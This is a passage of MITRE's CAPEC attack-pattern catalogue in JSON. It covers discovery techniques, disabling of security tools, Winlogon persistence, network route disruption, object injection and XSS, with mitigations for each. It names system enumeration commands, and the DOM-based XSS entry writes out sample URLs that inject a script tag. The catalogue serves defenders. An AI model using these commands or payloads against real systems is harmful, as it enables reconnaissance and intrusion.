Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Likelihood_Of_Attack, Taxonomy_Mappings, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"573":{"ID":"573","Name":"Process Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Example_Instances":{"Example":["On a Windows system, the command, \\"tasklist,\\" displays information about processes. The same function on a Mac OS system is done with the command, \\"ps.\\"","In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1057","Entry_Name":"Process Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"574":{"ID":"574","Name":"Services Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include \\"sc\\" and \\"tasklist/svc\\" using Tasklist, and \\"net start\\" using Net.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1007","Entry_Name":"System Service Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"575":{"ID":"575","Name":"Account Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: \\"net user\\" and \\"dsquery\\".","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1087","Entry_Name":"Account Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"576":{"ID":"576","Name":"Group Permission Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is \\"net localgroup\\".","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs (such as \\"net\\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1069","Entry_Name":"Permission Groups Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"577":{"ID":"577","Name":"Owner Footprinting","Abstraction":"Standard","Status":"Draft","Description":"An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \\"dir /A ntuser.dat\\". Which will display the last modified time of a user\'s ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.","Administrator permissions are required to view the home folder of other users."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Ensure that proper permissions on files and folders are enacted to limit accessibility."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1033","Entry_Name":"System Owner/User Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"578":{"ID":"578","Name":"Disable Security Software","Abstraction":"Standard","Status":"Usable","Description":"An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have the capability to interact with the configuration of the targeted system."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Hide Activities","Note":"By disabling certain security tools, the adversary can hide malicious activity and avoid detection."}},"Mitigations":{"Mitigation":"Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.001","Entry_Name":"Impair Defenses:Disable or Modify Tools"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"579":{"ID":"579","Name":"Replace Winlogon Helper DLL","Abstraction":"Detailed","Status":"Draft","Description":"Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Changes to registry entries in \\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\Winlogon\\\\Notify\\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.004","Entry_Name":"Boot or Logon Autostart Execution:Winlogon helper DLL"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}}},"580":{"ID":"580","Name":"System Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have logical access to the target network and system."},"Skills_Required":{"Skill":["The adversary needs to know basic linux commands.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1518","Entry_Name":"Software Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description"}],"Previous_Entry_Name":["Application Footprinting",{"Date":"2020-12-17"}]}},"581":{"ID":"581","Name":"Security Software Footprinting","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"580"}},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1518.001","Entry_Name":"Software Discovery:Security Software Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"582":{"ID":"582","Name":"Route Disabling","Abstraction":"Standard","Status":"Draft","Description":"An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \\"Internet kill switch\\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"The adversary requires knowledge of and access to network route."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a network route denies the availability of a service."}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-02-14"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"583":{"ID":"583","Name":"Disabling Network Hardware","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":"The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Denial of Service"}},"Mitigations":{"Mitigation":"Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems.."},"References":{"Reference":{"External_Reference_ID":"REF-464"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"584":{"ID":"584","Name":"BGP Route Disabling","Abstraction":"Detailed","Status":"Draft","Description":"An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince"},"Resources_Required":{"Resource":"BGP Router"},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a network route at the routing infrastructure level denies availability of that route."}},"Mitigations":{"Mitigation":["Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.","Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography."]},"Example_Instances":{"Example":"Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped."},"References":{"Reference":[{"External_Reference_ID":"REF-465"},{"External_Reference_ID":"REF-466"}]},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"585":{"ID":"585","Name":"DNS Domain Seizure","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, an adversary influences a target\'s web-hosting company to disables a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"514"},{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"This attack pattern requires that the adversary has cooperation from the registrar of the target domain."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a target domain at the infrastructure level denies the availability of its service to the user."}},"Example_Instances":{"Example":"The FBI\'s seizure of gambling websites, the US DOJ\'s seizure of child pornography websites, and Microsoft\'s seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains."},"References":{"Reference":{"External_Reference_ID":"REF-467"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"586":{"ID":"586","Name":"Object Injection","Abstraction":"Meta","Status":"Draft","Description":"An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application must unserialize data before validation."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources."},{"Scope":"Integrity","Impact":"Modify Data","Note":"Attackers can modify objects or data that was assumed to be safe from modification."},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Functions that assume information in the deserialized object is valid could be exploited."}]},"Mitigations":{"Mitigation":[{"p":"Implementation: Validate object before deserialization process"},{"p":"Design: Limit which types can be deserialized."},{"p":"Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes."},{"p":"Implementation: Keep session state on the server, when possible."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"502"}},"References":{"Reference":{"External_Reference_ID":"REF-468"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-02-06"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"587":{"ID":"587","Name":"Cross Frame Scripting (XFS)","Abstraction":"Detailed","Status":"Draft","Description":"This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"195","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The user\'s browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site."}},"Mitigations":{"Mitigation":["Avoid clicking on untrusted links.","Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame."]},"Example_Instances":{"Example":"An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Frame Scripting"}},"References":{"Reference":[{"External_Reference_ID":"REF-469"},{"External_Reference_ID":"REF-470"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-02-01"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, Mitigations, Taxonomy_Mappings"}]}},"588":{"ID":"588","Name":"DOM-Based XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that manipulates the DOM via client-side scripting.","An application that failS to adequately sanitize or encode untrusted input."]},"Skills_Required":{"Skill":["Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful DOM-based XSS attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.","Ensure that all user-supplied input is validated before use."]},"Example_Instances":{"Example":[{"p":["Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.","The application\u2019s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.","Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:"],"div":["http://my.site.com/aform.html?mode=full",{"style":"margin-left:10px;","class":"informative"},"<script>document.write(\\"<p>Mode is: \\" + document.location.href.substring(document.location.href.indexOf(\'mode=\') + 5) + \\"</p>\\");<\/script>",{"style":"margin-left:10px;","class":"informative"},"http://my.site.com/aform.html?mode=<script>alert(\'hi\');<\/script>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the \'#\' character) can be used.","In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim\'s browser and is still available to the client-side script code."],"div":["http://my.site.com/aform.html#mode=<script>alert(\'hi\')<\/script>",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"},{"CWE_ID":"83"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Reflected DOM Injection"}},"References":{"Reference":[{"External_Reference_ID":"REF-471"},{"External_Reference_ID":"REF-472"},{"External_Reference_ID":"REF-618","Section":"Testing for DOM Based Cross Site 